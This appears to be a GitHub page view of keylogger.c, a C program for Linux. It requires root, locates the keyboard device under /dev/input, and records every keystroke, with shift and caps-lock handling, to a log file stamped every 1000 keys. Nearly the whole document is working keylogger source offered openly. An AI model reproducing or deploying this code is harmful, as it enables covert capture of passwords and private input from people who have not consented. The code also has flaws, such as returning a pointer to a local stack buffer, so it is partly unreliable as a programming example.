-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathkeylogger.c
162 lines (133 loc) · 3.05 KB
/
keylogger.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <linux/input.h>
#include "functions.h"
#include "define.h"
// initializations
input_event event;
int shift = 0;
int caps = 0; // assuming capslock to be off
int keystroke_count = 0;
// get time
static char *getTimestamp(){
time_t ltime; /* calendar time */
ltime=time(NULL); /* get current cal time */
char *time = asctime(localtime(<ime));
time[strlen(time)-1] = 0;
return time;
}
// to find device file
static char *getKeyboardDevicePath(){
// get filename
char *filename;
char path[16];
FILE *fp = popen(COMMAND, "r");
filename = fgets(path, sizeof path-1, fp);
pclose(fp);
// concat /dev/input/ to filename
char *filepath;
char dest[32] = "/dev/input/";
filepath = strncat(dest, filename, strlen(filename));
return filepath;
}
// checking for shift key
static int isShiftPressed(int eventcode){
if((eventcode == LEFTSHIFT) || (eventcode == RIGHTSHIFT)){
return 1;
}
return 0;
}
// checking for capslock
static int isCapsOn(int eventcode){
if(eventcode == CAPSLOCK){
return 1;
}
return 0;
}
// check for chars like !@#$%^&*()_{}:"<>?
static char *checkKey(char *key){
for(int i=0; i<20; i++){
if(special_chars[0][i] == key){
return special_chars[1][i];
}
}
return key;
}
// convert event code to corresponding char
static char *pressedKey(int eventcode){
if(shift^caps){
char *key = keys_upper[eventcode];
if(shift == 1){
key = checkKey(key);
}
return key;
}
return keys_lower[eventcode];
}
// main function
int main(){
// root check
if(geteuid() != ROOTID){
printf("You must be root\n");
exit(0);
}
// get keyboard device file
char *devicefile = getKeyboardDevicePath();
// device file
int fp = open(devicefile, O_RDONLY);
// device file check
if(fp == -1){
printf("Device file not found\n");
exit(0);
}
// log file
FILE *lf = fopen(LOGFILE, "ab");
// log file check
if(lf == NULL){
printf("Error in opening Log file\n");
exit(0);
}
/* To disable buffering and allow writing to log file
as soon as a key is pressed. */
setbuf(lf, NULL);
// capturing keystrokes
while(1){
if(read(fp, &event, sizeof(input_event))>0){
if(event.type == EV_KEY){ // checking event type to be of keyboard
if(event.value == KEY_PRESS){
if(isShiftPressed(event.code)){
shift = 1;
}
if(isCapsOn(event.code)){
caps = caps^1; // switching caps value on every keypress
}
char *key = pressedKey(event.code);
fputs(key, lf);
}
if(event.value == KEY_RELEASE){
if(isShiftPressed(event.code)){
shift = 0;
}
}
if(keystroke_count == 1000){
char *time = getTimestamp(); // get timestamp
fputs("\n\n============================================ ", lf);
fputs(time, lf);
fputs(" =============================================\n\n", lf);
keystroke_count = 0;
}
keystroke_count++;
}
}
}
// close file
close(fp);
fclose(lf);
// footer
printf("Exiting...\n");
return 0;
}